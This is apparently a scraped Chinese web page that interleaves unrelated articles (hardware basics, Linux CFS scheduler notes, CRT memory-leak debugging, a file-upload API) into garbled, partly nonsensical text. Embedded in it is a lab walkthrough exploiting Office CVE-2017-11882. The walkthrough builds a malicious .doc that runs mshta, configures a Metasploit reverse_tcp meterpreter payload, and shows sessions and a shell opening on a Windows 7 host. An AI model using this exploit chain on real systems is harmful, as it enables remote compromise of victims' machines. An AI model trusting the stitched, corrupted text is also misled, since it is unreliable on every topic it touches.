上学形式以及Computer硬件基础,用CRT查找内部存款

日期:2019-10-09编辑作者:必赢娱乐

第1章 学习方法及工具

原型:public boolean isMissing()

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二〇一二、激活工具

  3. win7旗舰版ISO镜像

以上中国人民解放军海军事工业程高校业具已经打包好,下载地址:

链接:  密码:xl91

图片 1

 

  prio_to_weight表记录的是nice值对应的权重值。

Q : code在Release和Debug版下或然会不相同,最终或者会油可是生贰个有memory leak三个尚未

2.1.2 Computer硬件的重组

微型Computer硬件经常有调节器、运算器、存款和储蓄器、输入设备、输出设备。

1、getCount

0x00 漏洞简单介绍

二〇一七年二月12日,微软发表了1四月份的安全补丁更新,在那之中比较引人关怀的实际上悄然修复了遮掩17年之久的Office远程代码实施漏洞(CVE-2017-11882)。该漏洞为Office内部存款和储蓄器破坏漏洞,影响当下流行的具有Office版本。攻击者可以使用漏洞以当下登陆的客户的地点试行大肆命令。 由于漏洞影响面较广,漏洞揭露后,金睛安全钻探团体持续对漏洞有关攻击事件进展关爱。八月十日,监察和控制到了已有漏洞POC在网络流传,任何时候快速对有关样本实行了分析。近些日子该样本全球仅微软杀毒能够检测。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

主题素材七:CFS调治器对新创设的长河和刚唤醒的长河有啥照料?

Q : 未有栈回溯音讯,多层调用怎么查找源头音讯?

1.2 学习工具

职能:获得Request对象中装有参数的名字,用于遍历全部参数。它回到的是叁个枚举型的对象。

正马时候接到了推送的狐狸尾巴预先警告,在互连网搜索相关音信看来众多大拿已经支付出生成doc文书档案的台本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的选取。

  runnable_avg_yN_inv表是为了防止CPU做浮点总括,提前计算了公式2^32*实际衰减因子(第32ms约为0.5)的值,有三十多少个下标,对应过去0~32ms的载重进献的衰减因子。

{64} normal block at 0x007B4F90, 4 bytes long.

2.1.2.1  控制器

A、计控器是计算机的神经中枢,指挥全机中相继部件自动和谐工作。在调节器的决定下,Computer能够自行依照程序设定的步子举行一种类操作,以产生一定任务。

 

B、调控器内部的入眼构件如下:

①指令存放器:寄放由存款和储蓄器获得的指令。

②译码器:将指令中的操作码翻译成调节信号。

③时序节拍发生器:发生时序脉冲节拍时限信号,使Computer有一点子、井井有理地劳作。

④操作调整部件:将调整复信号结合起来,调控各样部件实现相应的操作。

⑤下令计数器:总结并提议下一条指令的地方。

 

2、getParameterValues

0x02 利用进程

  1. 生成doc

    #安装运行nginx [root@ihoneysec ~]# yum -y install nginx [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本 [root@ihoneysec ~]# git clone [root@ihoneysec ~]# cd CVE-2017-11882/ [root@ihoneysec CVE-2017-11882]# ls Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测量试验doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc [*] Done ! output file --> cve.doc [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta " -o cve2.doc [*] Done ! output file --> cve2.doc [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网址根目录 [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/ 404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测量试验经常弹出calc.exe计算器

图片 2

 

  1. kali msf配置Poc:

    root@kali:~# cd / # 将下载好的疏漏模块放在msf任性目录下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ # 检查ip地址 root@kali:/mnt/hgfs/kalishare# ifconfig eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

    ...

        =[ metasploit v4.16.6-dev                          ]
    
    • -- --=[ 1683 exploits - 964 auxiliary - 297 post ]
    • -- --=[ 498 payloads - 40 encoders - 10 nops ]
    • -- --=[ Free Metasploit Pro trial: ] # 搜索cve_2017_11882 漏洞模块 msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块 msf > use exploit/windows/smb/cve_2017_11882 # 设置payload为反弹tcp msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp # 设置本机ip msf exploit(cve_2017_11882) > set lhost 172.16.253.76 lhost => 172.16.253.76 # 设置uri的门路,要与第一步生成doc时安顿一致 msf exploit(cve_2017_11882) > set U福睿斯IPATH abc U奥德赛IPATH => abc # 检查当前安插msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882): Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.253.76 yes The listen address LPORT 4444 yes The listen port

      ...

      # 运行利用后,msf会监听本机8080端口,倘诺win7机器展开doc触发访问172.16.253.76:8080/abc就能够得到反弹到4444端口的tcp会话 msf exploit(cve_2017_11882) > exploit [] Exploit running as background job 0. # 初步监听 [] Started reverse TCP handler on 172.16.253.76:4444 msf exploit(cve_2017_11882) > [] Using URL: [] Local IP: [上学形式以及Computer硬件基础,用CRT查找内部存款和储蓄器泄漏。] Server started. [] Place the following DDE in an MS document: mshta.exe "" msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接 [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800 [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 [] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > sessions # 查看已经创建的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PCwin7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4) # 进入id为1的会话 msf exploit(cve_2017_11882) > sessions -i 1 [*] Starting interaction with 1... # 验证获得反弹连接是还是不是是win7机器ip meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:72:2e:7d MTU : 1500 IPv4 Address : 172.16.253.4 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::c15d:3813:94ec:d6c8 IPv6 Netmask : ffff:ffff:ffff:ffff::

      ...... # 步入命令情势meterpreter > shell Process 2924 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 二〇〇九 Microsoft Corporation����������Ȩ���� # 查看当前系统客户、主机名 C:Windowssystem32>net user net user

      WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:Windowssystem32>

  

 

  4种调整类经过next指针串联在同步,客商空间程序能够运用调节计策API函数(sched_setscheduler())来设定客商进度的调节战略。

#include <memory>

std ::tr1 ::shared_ptr <int >   sp_nTest;

void  Test ()
{
      sp_nTest. reset( new int( 0x88));

      //memory leak
      int*  pnTest = new int( 0xCC);

      void* pMalloc = malloc( sizeof( int));
}

 

原型:public void setTotalMaxFileSize(long totalMaxFileSize)

 

  runnable_avg_yN_sum表为1024*(y+y^2+…+y^n),y为实在衰减因子,n取1~32。(实际衰减因子下图所示)

7. Report格式

2.1.2.3  存储器

 

管理器中的存款和储蓄器经常蕴涵硬盘,ROM(只读存款和储蓄器)、RAM包蕴内部存款和储蓄器条、CMOS(断电后会遗失全数数据)

 

中间,sourceFilePathName为要下载的文书名(带目录的文本全名)

  对于睡眠进度,其vruntime在睡觉时期不抓好,在提拔后只要还用原本的vruntime值,会进行报复性满载运转,所以要改正vruntime,具体在enqueue_entity()函数中,总括公式为vruntime+=min_vruntime,vruntime=MAX(vruntime, min_vruntime-sysctl_sched_lantency/2)。

6. 暗中同意情状下,memory leak的report会在VS Studio Debug窗的Output窗口中,能够用_CrtSetReportMode()将其重定向到别的岗位。

2.1.6 Computer的计数制

A、 十进制:0 1 2 3 4 5 6 7 8 9

B、 二进制:0 1

C、 八进制:0 1 2 3 4 5 6 7

D、 十六进制:1 2 3 4 5 6 7 8 9 A B C D E F

进制转变详见:

3、getSize

标题五:vruntime是曾几何时更新的?

4. 在app exit前,能够调用这么些function打字与印刷memory leak report

2.1.3.4  服务器硬件

 

机箱:硬件的骨架

电源:就疑似人的命脉(AB双路电源,保障服务器持续运营)

CPU:

AMD:重要用Intel至强连串的CPU

AMD:接纳的争执非常少

CPU电风扇:减弱CPU的热度使CPU平时运维

硬盘:

机械硬盘:

SATA:串口、自用、体积大、价格平价、但速度相当慢

SAS:串口、线上情形主选SAS,结合了SATA和SCSI的长处

IED:并行、已经淘汰

SCSI:并行、已经淘汰

机械硬盘SSD:高并发、数据量小、选用SSD、价格较贵

光导纤维接口:FC Fibre Channel

 

内部存款和储蓄器:效用化解CPU和硬盘之间进程差别相当大的标题

缓存:

Buffer:缓冲区 数据写入到内部存款和储蓄器的buffer区域  写buffer

Cacha:缓冲区 从内部存款和储蓄器中的cache区中开展读取 读cache

5、getEnumeration

题材二:请简述进程优先级、nice和权重之间的涉及。

    别的,在code中也得以一直钦定:

1.2.3 博客

51CTO:注册在中间揭橥自个儿的笔记

天涯论坛:注册在里边公布温馨的笔记

 

原型:public int getSize()

  runnable_avg_sum为调治实体的可运维状态下总衰减累加时间。

A :  Debug,在app入口断下后,在watch窗口输入"_crtBreakAlloc"(若是"Runtime Library"是"/MD",则还必要丰硕"{,,ucrtbased.dll}_crtBreakAlloc"),那么些值应该是"-1",修改成detect到的memory leak的分配序号(如7中的{18}),当分配该大小的memory时就能够断下来(注意,重跑后的法则要和率先次获得分配序号的一样)。

2.1.4 Raid(阵列卡)

磁盘阵列(Redundant Arrays of Independent Disks,RAID),有“独立磁盘构成的富有冗余技艺的阵列”之意

 

详见:

 

效能:取文件全名(带目录)

  调解器是按自然的主意对进程打开调解的一种机制,供给为种种普通进度尽大概公平地分享CPU时间。

  1 #define _CRTDBG_MAP_ALLOC
  2 #include <stdlib.h>
  3 #include <crtdbg.h>

2.1.2.4  输入设备

 

计算机中输入设备是从顾客从外围输入要求管理的多少,平日包涵有键盘、鼠标、光驱、迈克风等等输入设备:向Computer输入数据和音讯的装置。是Computer与客商或此外装置通讯的大桥。输入设备是顾客和计算机连串里头开展新闻置换的机要安装之一。键盘,鼠标,摄像头,扫描仪,光笔,手写输入板,游戏杆,语音输入安装等都属于输入设备。输入设备(InputDevice)是人或外部与Computer进行交互的一种装置,用于把原有数据和处理那几个数的前后相继输入到Computer中。计算机能够收到精彩纷呈的数目,既可以够是数值型的数码,也能够是各个非数值型的数额,如图形、图像、声音等都得以经过分裂种类的输入设备输入到Computer中,实行仓库储存、管理和输出。

 

B.上传文件使用的秘技:

问题八:如何总计普通进程的平分负载load_avg_contrib?runnable_avg_sum和runnable_avg_period分别表示了什么意义?

3. "#define _CRTDBG_MAP_ALLOC"这一个宏不能轻易,不然memory leak的dump会缺乏一些细节(如leak的code位置音信)

2.1.1.1  图灵机理论

 

 

图灵机,又称图灵总计、图灵计算机,是由物历史学家Alan·麦席森·图灵(1914~壹玖伍肆)建议的一种浮泛总括模型,将要大家选取纸笔进行数学生运动算的进度进行抽象,由二个设想的机械替代大家实行数学生运动算。

所谓的图灵机就是指一个华而不实的机械,它有一条非常长的纸带,纸带分成了一个三个的小方格,每一个方格有例外的颜料。有多少个机器头在纸带上移来移去。机器头有一组内部景观,还也许有一对永久的程序。在各种时刻,机器头都要从当下纸带上读入一个方格消息,然后结合本身的里边景况查找程序表,遵照程序输出音信到纸带方格上,并改变本人的此中景况,然后开展运动。

 

① public void downloadFile(String sourceFilePathName)

难点六:CFS调整器中的min_vruntime有如何功用?

2.1.1.2  冯·诺依曼种类

 

 

美籍匈牙利(Magyarország)地医学家冯·诺依曼于1950年提议存款和储蓄程序原理,把程序本人作为数据来比较,程序和该程序处理的数码用平等的主意积攒。 冯·诺依曼种类布局冯·诺依曼理论的核激情想是:计算机的数制选择二进制;计算机应该根据程序各样试行。大家把冯·诺依曼的这一个理论称为冯·诺依曼连串布局。

 

 

原型:public Files getFiles()

图片 3图 实际衰减因子

2. 必须是Debug版的build

1.2.1 笔记类

会动用Notepad++、有道云笔记、影像笔记、马克飞象、为知笔记、马克down(马克down是一种能够使用普通文书编辑器编写的符号语言,通过轻便的符号语言的号子语法,他能够使平日的公文内容有一定的格式,看起来尤其美貌上档案的次序)

个中,destFile帕特hName是另存的文书名,optionSaveAs是另存的选项,该选取有四个值,分别是SAVEAS_PHYSICAL,SAVEAS_VIRTUAL,SAVEAS_AUTO。SAVEAS_PHYSICAL评释以操作系统的根目录为文件根目录另存文件,SAVEAS_VIRTUAL评释以Web应用程序的根目录为文件根目录另存文件,SAVEAS_AUTO则意味让组件决定,当Web应用程序的根目录存在另存文件的目录时,它会挑选SAVEAS_VIRTUAL,不然会选用SAVEAS_PHYSICAL。

  O(N)调整器揭橥与1995年,从就绪队列中比较全数进程的优先级,然后选拔三个最高优先级的经过作为下几个调解进度。每一个进度有一个固按时间片,当进度时间片使用完之后,调整器会选用下贰个调节进度,当全体进度都运营三次后再重新分配时间片。那么些调整器选用下贰个调解进程前须求遍历整个就绪队列,费用O(N)时间。

 

1.1 学习方法

担保每一日上学时光(10钟头),学习依照集团需要,以高薪为结果

先预习à看书、看视频à写作业à复习à总结

注:save(destPathName)作用同样save(dest帕特hName,SAVE_AUTO)。

主题材料九:内核代码中定义了多少个表,请分不要讲出它们的含义,举例prio_to_weight、prio_to_wmult、runnable_avg_yN_inv、runnable_avg_yN_sum。

Detected memory leaks!

Dumping objects ->

d:codesvs2010testdetectmemleakconsoletest.cpp(14) : {65} normal block at 0x007B18A8, 4 bytes long.

Data: <    > CD CD CD CD

2.1.3.2  服务器分类

 

A、 机架式服务器

 

机架式服务器的外形看来不像Computer,而像调换机,有1U(1U=1.75英寸)、2U、4U等原则。机架式服务器安装在正式的19英寸机柜里头。这种协会的多为作用型服务器。

B、 刀片式

 

刀子服务器是指在行业内部高度的机架式机箱内可插装三个卡式的服务器单元,是一种实现HAHD(High Availability High Density,高可用高密度)的低本钱服务器平台,为特殊应用行当和高密度总结情形极度规划。刀片服务器就疑似“刀片”同样,每一块“刀片”实际上就是一块系统主板。

C、 塔式

 

塔式服务器(Tower Server)应该是见得最多也最轻巧精通的一种服务器布局类型,因为它的外形乃至组织都跟立式PC大致,当然,由于服务器的主板扩充性较强、插槽也多出一批,所以个头比平常主板大学一年级些,因而塔式服务器的主机机箱也比标准的ATX机箱要大,日常都会留给丰裕的内部空间以便日后举办硬盘和电源的冗余扩展。

1、saveAs功效:将文件换名另存。

   一个历程等待不短日子过后(过了众八个period),原本的runnable_avg_sum和runable_ave_period值衰减后可能产生0,约等于事先的总结值被清0。

Detected memory leaks!

Dumping objects ->

c:usersusernamedocumentsprojectsleaktestleaktest.cpp(20) : {18}               //{18} : memory分配序号 

normal block at 0x00780E80, 64 bytes long.                                         //64 bytes : block的大小(并不是分配时指定的大小,因为分配的heap由于会添加堆头堆尾等额外信息,会比分配时指定的size要大) 

Data: <                > CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD CD

Object dump complete.

 

2.1.2.5  输出设备

 

输出设备(Output Device)是计算机硬件系统的极端设备,用于吸收接纳Computer数据的出口显示、打字与印刷、声音、调整外围设备操作等。也是把各个总结结果数据或新闻以数字、字符、图像、声音等方式表现出来。常见的输出设备有显示器、打印机、绘图仪、印象输出系统、语音输出系统、磁记录设备等

 

作用:上传文件数量。对于上传操作,第一步实践initialize方法,第二步就要进行那几个法子。

  内核使用0~139的数值表示经过的优先级,数值越低优先级越高。优先级0~99给实时进度使用,100~139给平日进程使用。在客商空间由二个思想的变量nice值映射到经常进度的优先级(100~139)。

_crtBreakAlloc = 18;

    or :

_CrtSetBreakAlloc(18);

2.1.3.3  服务器的品牌

详细新闻:

 

Dell(大多数商厦采纳Dell服务器)

HP

华为

IBM(百度)

联想

2、save

提议阅读博文理解linux cfs调度器

援用原来的小说地址

2.1.7 电脑中数据的象征

比特:bit(Computer中幽微的单位)

字节:byte(B)

进制转变:8bit=1byte  1024byte(B)=1kb   1024kb=1mb  1024mb=1gb  1024gb=1tb  1024tb=1eb 1024eb =1pb   1024pb=1zb

市道上卖的硬盘是按一千进制算的  500G硬盘=500*1000MB*1000KB

public void saveAs(java.lang.String destFilePathName)

标题十:如果三个常备进程在就绪队列里等待了相当长日子才被调治,那么它的平分负载该怎么计算?

深灰蓝部分是new出来的memory leak,可知并不会报出相应的code的行号

1.2.2 图像类

讨论导图软件:xmind(做出的思想导图加深记念,梳理关系逻辑)

图像管理类:Picpick

㈡ Files类

  权重音讯即为调治实体的权重,为了总括方便,内核约定nice值为0的权重值为1024,其余的nice值对应相应的权重值能够透过查表的措施来获取,表即为prio_to_weight。

    能够在相应的地点处下断点(会频仍断在malloc上,须要依靠size下标准断点)

2.1.3 服务器和平运动维

 

8、getBinaryData

  prio_to_wmult表记录的是nice值对应的权重值倒转后的值inv_weight=2^32/weight。

A : 这一个crtdbg对new管理不好,其block的地址只会new调用macro的地址,可用如下宏DBG_NEW来代替new,以打字与印刷出相应的行音讯

2.1.3.1  运行法规

 

启动人士的宗旨职务

A、数据的无法丢

B、可靠性(7*24钟头符合规律运作)

C、提高客商体验à访问快

 

8、setMaxFileSize

《奔跑吧linux内核》3.2笔记,不足之处还望大家研究指正

_CrtSetDbgFlag ( _CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF );

2.1.5 远程管理卡

A、 提供贰个单独的网络接口

B、 远程序调节制装置操作系统,能够投递温馨计算机上的ISO文件到服务器上边

C、 电源调整效果  开机 重启 关机

D、 检查服务器硬件状态  监察和控制电瓶 CPU 内存 磁盘等配备的劳作情景

E、 Dell远程序调整制卡的布局:

C.下载文件常用的主意

  对于新创制的进度,须要丰硕三个调整周期的设想是岁月(sched_vslice())。首先在task_fork_fair()函数中,place_entity()扩充了调整周期的设想时间,相当于查办,se->vruntime=sched_vslice()。接着新历程在加上到就绪队列时,wake_up_new_task()->activate_task()->enqueue_entity()函数里,se->vruntime+=cfs_rq->min_vruntime。

 

2.1.2.2  运算器

驷不及舌指CPU(中心处理器)是Computer中实施种种算术运算操作的零件。运算器的基本操作富含加减乘除四则运算,与或非等逻辑操作,以致运动、比较和传递等操作,亦算数逻辑部件。

功效:取全方位上传文件,以Files对象情势再次来到,能够使用Files类的操作方法来博取上传文件的多寡等音讯。

  进度大致能够分成交互式进度批管理过程实时进度。对于分歧的长河接纳分裂的调整攻略,最近Linux内核中暗中认可达成了4种调解计策,分别是deadline、realtime、CFS和idle,分别适用struct sched_class来定义调解类。

1. 在program中严峻按上面顺序include

本文由必赢娱乐app下载发布于必赢娱乐,转载请注明出处:上学形式以及Computer硬件基础,用CRT查找内部存款

关键词:

不要让客人随意进入你的被窝,读书笔记

一、介绍 一 zabbix 的安装配置 一.枚举服务 0x00 前言 在Github上发掘的,认为表单很棒,可是依旧差十分少,现在会陆...

详细>>

安装及安排,CA210彩分仪校准步骤

0 操作成功完毕. 1 成效错误. 2 系统找不到钦赐的文件. 3 系统找不到钦定的路线. 4 系统不能够张开文件. 5 拒绝访问...

详细>>

Vim中安装括号自动补全,04中截图工具Shutter的编

必赢娱乐app下载 ,CentOS6、7安装MySQL5.7全教程 做开拓总得用到数量吧,Linux作为服务器,总得有多个数据库来囤积测量...

详细>>

中增添JavaFX插件学习,每日一个Linux命令

Windows as a Service(2)——使用WSUS管理Windows10更新 1.echo gt;echo 1111 gt;Preferences--JavaFX--browse路线是可实践的JavaFX Scene Bu...

详细>>